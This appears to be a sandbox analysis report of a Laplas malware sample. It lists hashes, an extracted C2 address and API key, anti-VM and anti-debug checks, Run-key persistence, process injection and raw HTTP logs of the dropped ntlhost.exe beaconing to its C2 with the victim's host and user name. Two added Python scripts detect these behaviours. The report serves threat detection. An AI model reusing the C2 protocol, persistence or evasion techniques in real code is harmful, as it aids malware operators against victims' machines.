Analysis
max time kernel: 270s
max time network: 286s
platform: windows7_x64
resource: win7-20230712-en
resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
submitted: 21/07/2023, 00:18 UTC
Static task: static1
Behavioral task: behavioral1
Sample: 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Resource: win7-20230712-en
General
Target: 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Size: 3.2MB
MD5: 4472444218925ed8fd4982f141af1978
SHA1: 101ff99cec2f571002915f23290d495671967db3
SHA256: 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c
SHA512: b2255bced17a9cf9ab8afb461cea7005d2df77984f3122609d82d9a2f7f5ec3ca23ee8f20f609e60937db134ef721bf90fd759ddbe4df9acbf6216d8d2e15cff
SSDEEP: 98304:iiuvmFRChTCXAVCAujVcbeyLwQ5ltcD6VIl:VRI8AaadcDhl
Malware Config
Extracted
Family: laplas
C2: http://168.100.10.236
api_key: f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ntlhost.exe

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ntlhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ntlhost.exe

Executes dropped EXE (1 IoC)
pid | process
2580 | ntlhost.exe

Loads dropped DLL (1 IoC)
pid | process
1700 | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe

Adds Run key to start application (2 TTPs, 1 IoC)
The value is written under the user hive (HKU\<SID>, i.e. HKCU for the Admin account), so the autostart is per-user and needs no elevation.
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe

Checks whether UAC is enabled (2 IoCs)
The EnableLUA policy value reports whether UAC is active on the host.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ntlhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | process
1700 | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe
2580 | ntlhost.exe

GoLang User-Agent (1 IoC)
Uses default user-agent string defined by GoLang HTTP packages.
description | flow | ioc
HTTP User-Agent header | 2 | Go-http-client/1.1

Suspicious use of WriteProcessMemory (3 IoCs)
description | pid | process | procid_target
PID 1700 wrote to memory of 2580 | 1700 | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe | 28
PID 1700 wrote to memory of 2580 | 1700 | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe | 28
PID 1700 wrote to memory of 2580 | 1700 | 613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe | 28
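The registry IoCs above are what the sandbox's signatures matched on. As an added example (not tria.ge's code and not the sample's), the Python below classifies registry-access events of this shape into the report's signature categories and links the Run-key value to the dropped binary it launches. The event records are constructed from the IoCs listed above; the rule names, the event layout, and the acceptance of the FADT and RSDT tables alongside DSDT are my assumptions (the report itself only shows DSDT).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Process names taken from the report.
PARENT = "613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe"
CHILD = "ntlhost.exe"


@dataclass(frozen=True)
class RegEvent:
    action: str                  # key_opened | value_queried | value_set (assumed layout)
    path: str                    # native \REGISTRY\... path as the sandbox logs it
    process: str
    data: Optional[str] = None   # value data, present for value_set


# Constructed from the IoCs in the Signatures section; not a sandbox export.
EVENTS = [
    RegEvent("key_opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", PARENT),
    RegEvent("key_opened", r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__", CHILD),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", PARENT),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion", PARENT),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion", CHILD),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion", CHILD),
    RegEvent("value_set",
             r"\REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000"
             r"\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem",
             PARENT, data=r'"C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"'),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", PARENT),
    RegEvent("value_queried", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", CHILD),
]

# Rule names are assumptions that mirror the report's signature titles. The ACPI
# rule also accepts FADT and RSDT, whose OEM ID is likewise VBOX__ under VirtualBox;
# the report only shows DSDT being opened.
RULES = [
    ("anti_vm_virtualbox_acpi", {"key_opened", "value_queried"},
     re.compile(r"\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__", re.I)),
    ("anti_sandbox_bios_version", {"value_queried"},
     re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.I)),
    ("checks_uac_enabled", {"value_queried"},
     re.compile(r"\\Policies\\System\\EnableLUA$", re.I)),
    ("persistence_run_key", {"value_set"},
     re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)),
]
RUN_KEY_RE = RULES[3][2]


def classify(events):
    """Map each triggered rule to the sorted list of processes that triggered it."""
    hits = {}
    for ev in events:
        for name, actions, pattern in RULES:
            if ev.action in actions and pattern.search(ev.path):
                hits.setdefault(name, set()).add(ev.process)
    return {name: sorted(procs) for name, procs in hits.items()}


def persisted_binaries(events):
    """Image paths written into Run values. The sandbox renders the data quoted and
    with doubled backslashes, so both are undone before any path comparison."""
    paths = []
    for ev in events:
        if ev.action == "value_set" and ev.data and RUN_KEY_RE.search(ev.path):
            paths.append(ev.data.strip('"').replace("\\\\", "\\"))
    return paths


def run_key_launches(events, spawned_images):
    """Spawned image paths that the sample also registered for autostart."""
    persisted = {p.lower() for p in persisted_binaries(events)}
    return sorted(img for img in spawned_images if img.lower() in persisted)


if __name__ == "__main__":
    for rule, procs in classify(EVENTS).items():
        print(f"{rule}: {', '.join(procs)}")
    print("autostart:", persisted_binaries(EVENTS))
```

Matching on the value_set action for the Run key (rather than any access) keeps benign reads of the Run key out of the persistence rule; the dropped-binary link is the check a responder wants, because it ties the registry IoC to the child process in the tree.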
Processes

1. C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe (PID 1700)
   Command line: "C:\Users\Admin\AppData\Local\Temp\613d401501fccdf49d405bb8b6ce5f6fe96a2619db54e1e7a6f2410eb2aec72c.exe"
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Loads dropped DLL
   - Adds Run key to start application
   - Checks whether UAC is enabled
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe (PID 2580, spawned by PID 1700)
      Command line: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
Network

All traffic is plain HTTP to 168.100.10.236:80 on a single connection attributed to ntlhost.exe. Each round is a GET /bot/regex followed by a GET /bot/online; the key parameter equals the api_key in the extracted config, and the guid parameter is the sandbox hostname and user (YKQDESCX\Admin). The /bot/regex response body (633 bytes of text/plain each time) is not included in the report.

Round 1 (Fri, 21 Jul 2023 00:18:59 GMT)

Request:
GET /bot/regex HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response:
HTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:18:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive

Request (ntlhost.exe):
GET /bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin HTTP/1.1
Host: 168.100.10.236
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response:
HTTP/1.1 200 OK
Date: Fri, 21 Jul 2023 00:18:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive

Rounds 2 to 5 repeat the same two requests with identical headers and identical responses (200 OK, 633 and 2 bytes respectively) at 00:20:04, 00:21:10, 00:22:16 and 00:23:23 GMT, roughly one round every 65 to 67 seconds.

Connection summary
Remote address: 168.100.10.236:80
Protocol: http
Process: ntlhost.exe
Bytes: 2.7kB sent, 6.6kB received
Packets: 27 / 31
HTTP requests: 10 (5 × GET http://168.100.10.236/bot/regex and 5 × GET http://168.100.10.236/bot/online?key=f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79&guid=YKQDESCX\Admin), all answered 200
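As an added example (not tria.ge's code and not the sample's), the Python below runs over request records of the kind shown above, picks out the Laplas check-in pattern (default Go user-agent, /bot/online with a 64-hex key and a HOST\User guid), ties the key back to the api_key in the extracted config, and measures the beacon interval. The log lines are constructed from the Network section in an assumed one-line-per-request layout; the field names and the check-in rule are my assumptions drawn from this one report.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# api_key from the report's extracted Laplas config.
CONFIG_API_KEY = "f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79"

# Constructed from the Network section: the five rounds, two requests each,
# in an assumed "timestamp method url UA=... status=... len=..." layout.
C2 = "http://168.100.10.236"
ROUNDS = ["00:18:59", "00:20:04", "00:21:10", "00:22:16", "00:23:23"]
HTTP_LOG = "\n".join(
    f"2023-07-21 {t} GET {C2}/bot/regex UA=Go-http-client/1.1 status=200 len=633\n"
    f"2023-07-21 {t} GET {C2}/bot/online?key={CONFIG_API_KEY}&guid=YKQDESCX\\Admin "
    f"UA=Go-http-client/1.1 status=200 len=2"
    for t in ROUNDS
)

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"UA=(?P<ua>\S+) status=(?P<status>\d+) len=(?P<length>\d+)$"
)
# net/http sends Go-http-client/1.1; the HTTP/2 transport sends Go-http-client/2.0.
GO_DEFAULT_UA = re.compile(r"^Go-http-client/\d\.\d$")
HEX64 = re.compile(r"^[0-9a-f]{64}$")


def parse_log(text):
    """Parse the assumed one-line-per-request layout into dicts; skip lines that do not fit."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
        rec["status"] = int(rec["status"])
        rec["length"] = int(rec["length"])
        records.append(rec)
    return records


def laplas_checkins(records):
    """Select check-ins shaped like the report's: Go default UA and
    /bot/online?key=<64 hex>&guid=<HOST\\User>. Other paths are ignored."""
    found = []
    for rec in records:
        parts = urlsplit(rec["url"])
        if parts.path != "/bot/online" or not GO_DEFAULT_UA.match(rec["ua"]):
            continue
        query = parse_qs(parts.query)
        key = query.get("key", [""])[0]
        guid = query.get("guid", [""])[0]
        host, sep, user = guid.partition("\\")
        if not (HEX64.match(key) and sep):
            continue
        found.append({"ts": rec["ts"], "c2": parts.netloc, "key": key, "host": host, "user": user})
    return found


def beacon_intervals(checkins):
    """Seconds between consecutive check-ins; a narrow spread is the beaconing tell."""
    stamps = sorted(c["ts"] for c in checkins)
    return [int((later - earlier).total_seconds()) for earlier, later in zip(stamps, stamps[1:])]


def keys_match_config(checkins, api_key):
    """True when every check-in carries the api_key recovered from the config."""
    return bool(checkins) and all(c["key"] == api_key for c in checkins)


if __name__ == "__main__":
    checkins = laplas_checkins(parse_log(HTTP_LOG))
    for c in checkins:
        print(c["ts"].time(), c["c2"], c["host"], c["user"])
    print("intervals:", beacon_intervals(checkins))
    print("key matches config:", keys_match_config(checkins, CONFIG_API_KEY))
```

The user-agent alone is a weak signal, since any Go program using net/http without setting its own header sends it; the combination with the /bot/online query shape and the fixed-interval cadence is what separates this traffic from ordinary Go clients.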
Downloads

Filesize: 728.2MB
MD5: c03a56a67a089c6c0ed7cc93654ae263
SHA1: 16113fdafe44cfcc4a93507f3602b9f7652ae976
SHA256: 26892056ce7e92cf839c76b09a2caa4510f326d812a6677c2f5dc3e61900b45e
SHA512: 02ccd1e7fc5c7564e2fc6587d495c83da61df5319cb9bbdc38c81371dbdafa2c3bfc7360831c79d0a654d9adf443aece6dd9b5c11d4b83ce177e4caf7c7a0400